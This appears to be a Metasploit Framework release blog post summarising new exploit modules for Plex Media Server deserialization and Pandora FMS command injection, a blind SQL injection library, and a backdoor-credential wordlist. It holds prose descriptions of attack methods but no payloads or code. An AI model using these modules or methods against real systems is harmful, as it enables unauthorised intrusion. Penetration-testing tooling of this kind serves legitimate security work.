Plex unpickling

The exploit/windows/http/plex_unpickle_dict_rce module by h00die exploits an authenticated Python deserialization vulnerability in Plex Media Server. The module exploits the vulnerability by creating a photo library and uploading a Dict file containing a Python payload to the library’s path. Code execution is then achieved by triggering the plugin loading functionality, which unpickles the Dict file without any form of validation of its contents.

SQLi library

Through GSoC, Niboucha Redouane has added a SQL injection library supporting MySQL to Framework. The new library can aid in exploiting boolean and time-based blind injections, offering functionality that performs the more common queries for users. The auxiliary/sqli/openemr/openemr_sqli_dump and exploit/linux/http/eyesofnetwork_autodiscovery_rce modules can be utilized to see the library functionality in action.

Pandora FMS Events RCE

Erik Wynter added a new exploit module for various versions of the network monitoring software, Pandora FMS. The module exploits a command injection vulnerability found in Pandora’s events functionality. Remote code execution can be achieved by sending a POST request containing the payload in the target parameter. Having credentials to a low-privileged user account or higher is required to exploit this vulnerability.

New modules (2)

Enhancements and features

  • PR #13626 by bcoles adds some improvements to the post/windows/gather/checkvm module: The module’s line count has been reduced by approximately 30%, and its execution time has shortened by ensuring that the registry_enumkeys() and session.sys.process.get_processes() methods are only called once.
  • PR #13750 by h00die consolidates the modules within the /cisco, /juniper, /ubiquiti, and /brocade folders into the /networking folder. This PR also improves code style and the documentation for the modules.
  • PR #13759 by antoinet adds the BaselineAuthTime advanced option to the auxiliary/scanner/http/owa_login module. This option allows the user to define the expected authentication response time in order to better differentiate between valid and invalid credentials.
  • PR #13841 by bcoles adds the is_root?() method to the Msf::Post::Unix mixin and updates FreeBSD and OpenBSD local exploit modules to use the new method.
  • PR #13848 by 0x44434241 adds the telnet_cdata_ftth_backdoor_userpass.txt wordlist that contains admin credentials found hard coded in CDATA OLT devices.
  • PR #13596 by Niboucha Redouane adds a new SQLi library and updates the auxiliary/sqli/openemr/openemr_sqli_dump and exploits/linux/http/eyesofnetwork_autodiscovery_rce modules to utilize the new library functionality.

Bugs fixed

  • PR #13271 by h00die fixes a timeout error in auxiliary/server/capture/smtp by implementing logic to handle RSET commands. Additionally, the module can now store login, cram-md5, and plain creds in the database.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).